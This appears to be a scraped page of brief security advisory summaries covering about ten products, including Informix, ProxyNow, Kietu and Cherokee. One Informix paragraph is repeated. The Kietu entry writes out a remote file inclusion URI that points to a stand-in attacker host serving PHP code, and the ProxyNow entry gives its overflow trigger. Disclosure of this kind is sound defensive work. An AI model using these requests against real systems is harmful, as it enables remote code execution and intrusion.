A problem has been identified in the handling of specific types of requests by SurfNOW. Upon receiving specially crafted HTTP GET requests, it is possible for a remote attacker to crash a vulnerable implementation, denying service to the user.
Web Blog is prone to a file disclosure vulnerability. Remote attackers may gain access to files on the system hosting the server that reside outside of the server root by submitting a malicious request that contains directory traversal sequences. This would permit the attacker to access files that are readable by the server and could disclose sensitive information.
BRS WebWeaver has been reported prone to a cross-site scripting vulnerability. An attacker may create a malicious link to the vulnerable server that includes embedded HTML and script code. If this link is followed by a victim user, hostile code embedded in the link may be rendered in the user's browser in the context of the server. Successful exploitation could permit theft of cookie-based authentication credentials or other attacks.
OracleAS TopLink Mapping Workbench is reported to use a weak encryption algorithm when storing passwords in XML files. A proof-of-concept has been released that demonstrates how passwords are encrypted, by reversing the process described in the proof-of-concept, an attacker with access to XML files generated by the software could decrypt embedded passwords. The encryption scheme uses a simplistic substitution cipher and then appends a static string to the end of the encrypted password.
The first issue exists in the onedcu binary. Specifically, when the binary is invoked a predictable temporary file is created. A local attacker may exploit this issue to launch symbolic link style attacks ultimately resulting in elevated privileges. The second issue that has been reported to exist in the ontape binary. The ontape binary has been reported to be prone to a local stack based buffer overflow vulnerability. Ultimately the attacker may exploit this condition to influence execution flow of the vulnerable binary into attacker-controlled memory. This may lead to the execution of arbitrary instructions with elevated privileges. A third issue has been reported to affect the onshowaudit binary. Specifically, the onshowaudit binary reads data from temporary files contained in the 'tmp?' directory. These files have predictable filenames; an attacker may exploit this issue to disclose data that may be used in further attacks launched against the vulnerable system.
IBM Informix Dynamic Server and IBM Informix Extended Parallel Server have been reported prone to multiple vulnerabilities. The first issue exists in the onedcu binary. Specifically, when the binary is invoked a predictable temporary file is created. A local attacker may exploit this issue to launch symbolic link style attacks ultimately resulting in elevated privileges. The second issue that has been reported to exist in the ontape binary. The ontape binary has been reported to be prone to a local stack based buffer overflow vulnerability. Ultimately the attacker may exploit this condition to influence execution flow of the vulnerable binary into attacker-controlled memory. This may lead to the execution of arbitrary instructions with elevated privileges. A third issue has been reported to affect the onshowaudit binary. Specifically, the onshowaudit binary reads data from temporary files contained in the 'tmp?' directory. These files have predictable filenames; an attacker may exploit this issue to disclose data that may be used in further attacks launched against the vulnerable system.
ProxyNow versions 2.75 and prior have been reported to be prone to multiple overflow vulnerabilities that may allow an attacker to execute arbitrary code in order to gain unauthorized access to a vulnerable system. The vulnerabilities present themselves when an attacker sends a HTTP GET request containing an excessively long URI to the server on TCP port 3128. The URI must be prefixed with the string 'ftp://'.
A flaw exists in the Kietu 'index.php' script that may permit remote attackers to include malicious remote files. Remote users may influence the include path for the 'config.php' configuration file, which may result in execution of arbitrary commands with the privileges of the webserver process. Issuing the URI request to the vulnerable server will facilitate remote attacker php script execution: http://www.example.com/index.php?kietu[url_hit]=http://[attacker]/ Where the 'config.php' file must exist: http://[attacker]/config.php
Cherokee web server is vulnerable to Cross-Site Scripting (XSS) attacks via error pages. An attacker can craft a malicious URI link containing HTML or script code and entice a user to follow it. The attacker-supplied code may be rendered in the web browser of a user who follows the malicious link. Exploitation of this issue may allow for theft of cookie-based authentication credentials or other attacks.
It has been reported that Antologic Antolinux may be prone to a remote command execution vulnerability that may allow an attacker to execute arbitrary commands with the privileges of the server hosting the vulnerable software. The issue exists due to insufficient sanitization of user-supplied input via the 'NDCR' parameter. An attacker may need to spoof the HTTP REFERER and the vulnerability may only be exploited if sudo is not enabled.
Services By CQR